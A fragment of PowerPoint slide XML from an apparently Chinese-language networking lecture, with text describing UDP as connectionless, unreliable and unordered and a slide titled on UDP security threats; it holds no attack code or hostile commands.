                  <a:pt x="7489770" y="580320"/>
                  <a:pt x="7464118" y="580320"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96722" y="580320"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71070" y="580320"/>
                  <a:pt x="46468" y="570130"/>
                  <a:pt x="28329" y="551991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10190" y="533852"/>
                  <a:pt x="0" y="509250"/>
                  <a:pt x="0" y="483598"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="96722"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="36629D"/>
          </a:solidFill>
          <a:ln w="63500" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="104529" tIns="104529" rIns="104529" bIns="10452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无连接的协议</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44036" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="2663825"/>
            <a:ext cx="7561262" cy="514350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7560840"/>
              <a:gd name="T1" fmla="*/ 0 h 513360"/>
              <a:gd name="T2" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T3" fmla="*/ 0 h 513360"/>
              <a:gd name="T4" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T5" fmla="*/ 522340 h 513360"/>
              <a:gd name="T6" fmla="*/ 0 w 7560840"/>
              <a:gd name="T7" fmla="*/ 522340 h 513360"/>
              <a:gd name="T8" fmla="*/ 0 w 7560840"/>
              <a:gd name="T9" fmla="*/ 0 h 513360"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7560840"/>
              <a:gd name="T16" fmla="*/ 0 h 513360"/>
              <a:gd name="T17" fmla="*/ 7560840 w 7560840"/>
              <a:gd name="T18" fmla="*/ 513360 h 513360"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7560840" h="513360">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7560840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7560840" y="513360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5133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057" tIns="22860" rIns="128016" bIns="2286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传输数据之前，源端和目的端无需建立连接。</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44037" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="3178175"/>
            <a:ext cx="7561262" cy="581025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7560840"/>
              <a:gd name="T1" fmla="*/ 97785 h 580320"/>
              <a:gd name="T2" fmla="*/ 28347 w 7560840"/>
              <a:gd name="T3" fmla="*/ 28641 h 580320"/>
              <a:gd name="T4" fmla="*/ 96767 w 7560840"/>
              <a:gd name="T5" fmla="*/ 0 h 580320"/>
              <a:gd name="T6" fmla="*/ 7467862 w 7560840"/>
              <a:gd name="T7" fmla="*/ 0 h 580320"/>
              <a:gd name="T8" fmla="*/ 7536290 w 7560840"/>
              <a:gd name="T9" fmla="*/ 28641 h 580320"/>
              <a:gd name="T10" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T11" fmla="*/ 97785 h 580320"/>
              <a:gd name="T12" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T13" fmla="*/ 488910 h 580320"/>
              <a:gd name="T14" fmla="*/ 7536290 w 7560840"/>
              <a:gd name="T15" fmla="*/ 558055 h 580320"/>
              <a:gd name="T16" fmla="*/ 7467862 w 7560840"/>
              <a:gd name="T17" fmla="*/ 586696 h 580320"/>
              <a:gd name="T18" fmla="*/ 96767 w 7560840"/>
              <a:gd name="T19" fmla="*/ 586696 h 580320"/>
              <a:gd name="T20" fmla="*/ 28347 w 7560840"/>
              <a:gd name="T21" fmla="*/ 558055 h 580320"/>
              <a:gd name="T22" fmla="*/ 0 w 7560840"/>
              <a:gd name="T23" fmla="*/ 488910 h 580320"/>
              <a:gd name="T24" fmla="*/ 0 w 7560840"/>
              <a:gd name="T25" fmla="*/ 97785 h 5803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60840"/>
              <a:gd name="T40" fmla="*/ 0 h 580320"/>
              <a:gd name="T41" fmla="*/ 7560840 w 7560840"/>
              <a:gd name="T42" fmla="*/ 580320 h 5803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60840" h="580320">
                <a:moveTo>
                  <a:pt x="0" y="96722"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="71070"/>
                  <a:pt x="10190" y="46468"/>
                  <a:pt x="28329" y="28329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46468" y="10190"/>
                  <a:pt x="71070" y="0"/>
                  <a:pt x="96722" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7464118" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7489770" y="0"/>
                  <a:pt x="7514372" y="10190"/>
                  <a:pt x="7532511" y="28329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7550650" y="46468"/>
                  <a:pt x="7560840" y="71070"/>
                  <a:pt x="7560840" y="96722"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7560840" y="483598"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7560840" y="509250"/>
                  <a:pt x="7550650" y="533852"/>
                  <a:pt x="7532511" y="551991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7514372" y="570130"/>
                  <a:pt x="7489770" y="580320"/>
                  <a:pt x="7464118" y="580320"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96722" y="580320"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71070" y="580320"/>
                  <a:pt x="46468" y="570130"/>
                  <a:pt x="28329" y="551991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10190" y="533852"/>
                  <a:pt x="0" y="509250"/>
                  <a:pt x="0" y="483598"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="96722"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3E528A"/>
          </a:solidFill>
          <a:ln w="63500" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="104529" tIns="104529" rIns="104529" bIns="10452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不可靠的协议 </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44038" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="3759200"/>
            <a:ext cx="7561262" cy="641350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7560840"/>
              <a:gd name="T1" fmla="*/ 0 h 641700"/>
              <a:gd name="T2" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T3" fmla="*/ 0 h 641700"/>
              <a:gd name="T4" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T5" fmla="*/ 638557 h 641700"/>
              <a:gd name="T6" fmla="*/ 0 w 7560840"/>
              <a:gd name="T7" fmla="*/ 638557 h 641700"/>
              <a:gd name="T8" fmla="*/ 0 w 7560840"/>
              <a:gd name="T9" fmla="*/ 0 h 641700"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7560840"/>
              <a:gd name="T16" fmla="*/ 0 h 641700"/>
              <a:gd name="T17" fmla="*/ 7560840 w 7560840"/>
              <a:gd name="T18" fmla="*/ 641700 h 641700"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7560840" h="641700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7560840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7560840" y="641700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6417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057" tIns="22860" rIns="128016" bIns="2286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如果在从发送方到接收方的传递过程中出现数据报的丢失，协议本身并不能做出任何检测或提示</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44039" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="4400550"/>
            <a:ext cx="7561262" cy="579438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7560840"/>
              <a:gd name="T1" fmla="*/ 95407 h 580320"/>
              <a:gd name="T2" fmla="*/ 28347 w 7560840"/>
              <a:gd name="T3" fmla="*/ 27942 h 580320"/>
              <a:gd name="T4" fmla="*/ 96767 w 7560840"/>
              <a:gd name="T5" fmla="*/ 0 h 580320"/>
              <a:gd name="T6" fmla="*/ 7467862 w 7560840"/>
              <a:gd name="T7" fmla="*/ 0 h 580320"/>
              <a:gd name="T8" fmla="*/ 7536290 w 7560840"/>
              <a:gd name="T9" fmla="*/ 27942 h 580320"/>
              <a:gd name="T10" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T11" fmla="*/ 95407 h 580320"/>
              <a:gd name="T12" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T13" fmla="*/ 477022 h 580320"/>
              <a:gd name="T14" fmla="*/ 7536290 w 7560840"/>
              <a:gd name="T15" fmla="*/ 544486 h 580320"/>
              <a:gd name="T16" fmla="*/ 7467862 w 7560840"/>
              <a:gd name="T17" fmla="*/ 572430 h 580320"/>
              <a:gd name="T18" fmla="*/ 96767 w 7560840"/>
              <a:gd name="T19" fmla="*/ 572430 h 580320"/>
              <a:gd name="T20" fmla="*/ 28347 w 7560840"/>
              <a:gd name="T21" fmla="*/ 544486 h 580320"/>
              <a:gd name="T22" fmla="*/ 0 w 7560840"/>
              <a:gd name="T23" fmla="*/ 477022 h 580320"/>
              <a:gd name="T24" fmla="*/ 0 w 7560840"/>
              <a:gd name="T25" fmla="*/ 95407 h 5803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60840"/>
              <a:gd name="T40" fmla="*/ 0 h 580320"/>
              <a:gd name="T41" fmla="*/ 7560840 w 7560840"/>
              <a:gd name="T42" fmla="*/ 580320 h 5803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60840" h="580320">
                <a:moveTo>
                  <a:pt x="0" y="96722"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="71070"/>
                  <a:pt x="10190" y="46468"/>
                  <a:pt x="28329" y="28329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46468" y="10190"/>
                  <a:pt x="71070" y="0"/>
                  <a:pt x="96722" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7464118" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7489770" y="0"/>
                  <a:pt x="7514372" y="10190"/>
                  <a:pt x="7532511" y="28329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7550650" y="46468"/>
                  <a:pt x="7560840" y="71070"/>
                  <a:pt x="7560840" y="96722"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7560840" y="483598"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7560840" y="509250"/>
                  <a:pt x="7550650" y="533852"/>
                  <a:pt x="7532511" y="551991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7514372" y="570130"/>
                  <a:pt x="7489770" y="580320"/>
                  <a:pt x="7464118" y="580320"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96722" y="580320"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71070" y="580320"/>
                  <a:pt x="46468" y="570130"/>
                  <a:pt x="28329" y="551991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10190" y="533852"/>
                  <a:pt x="0" y="509250"/>
                  <a:pt x="0" y="483598"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="96722"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="464B79"/>
          </a:solidFill>
          <a:ln w="63500" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="104529" tIns="104529" rIns="104529" bIns="10452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不保序的协议</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44040" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="4979988"/>
            <a:ext cx="7561262" cy="512762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7560840"/>
              <a:gd name="T1" fmla="*/ 0 h 513360"/>
              <a:gd name="T2" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T3" fmla="*/ 0 h 513360"/>
              <a:gd name="T4" fmla="*/ 7564624 w 7560840"/>
              <a:gd name="T5" fmla="*/ 508003 h 513360"/>
              <a:gd name="T6" fmla="*/ 0 w 7560840"/>
              <a:gd name="T7" fmla="*/ 508003 h 513360"/>
              <a:gd name="T8" fmla="*/ 0 w 7560840"/>
              <a:gd name="T9" fmla="*/ 0 h 513360"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7560840"/>
              <a:gd name="T16" fmla="*/ 0 h 513360"/>
              <a:gd name="T17" fmla="*/ 7560840 w 7560840"/>
              <a:gd name="T18" fmla="*/ 513360 h 513360"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7560840" h="513360">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7560840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7560840" y="513360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5133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057" tIns="22860" rIns="128016" bIns="2286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不能确保数据的发送和接收顺序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44037"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4403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4035"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44035"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44035"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44035"/>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4039"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44039"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44039"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44039"/>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44036"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44036"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44036"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44036"/>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4038"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44038"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44038"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4403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4040"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44040"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44040"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="440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ldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="44036" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="44037" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="44038" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="44039" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="44040" grpId="0" bldLvl="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DA9C932C-1F11-4353-BF65-BAB5A3DDE842}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>UDP的安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4506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26368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652963"/>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062" name="Shape 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2419350" y="3108325"/>
            <a:ext cx="4862513" cy="1544638"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45063" name="Shape 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2419350" y="3108325"/>
            <a:ext cx="1905000" cy="1616075"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45064" name="Shape 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
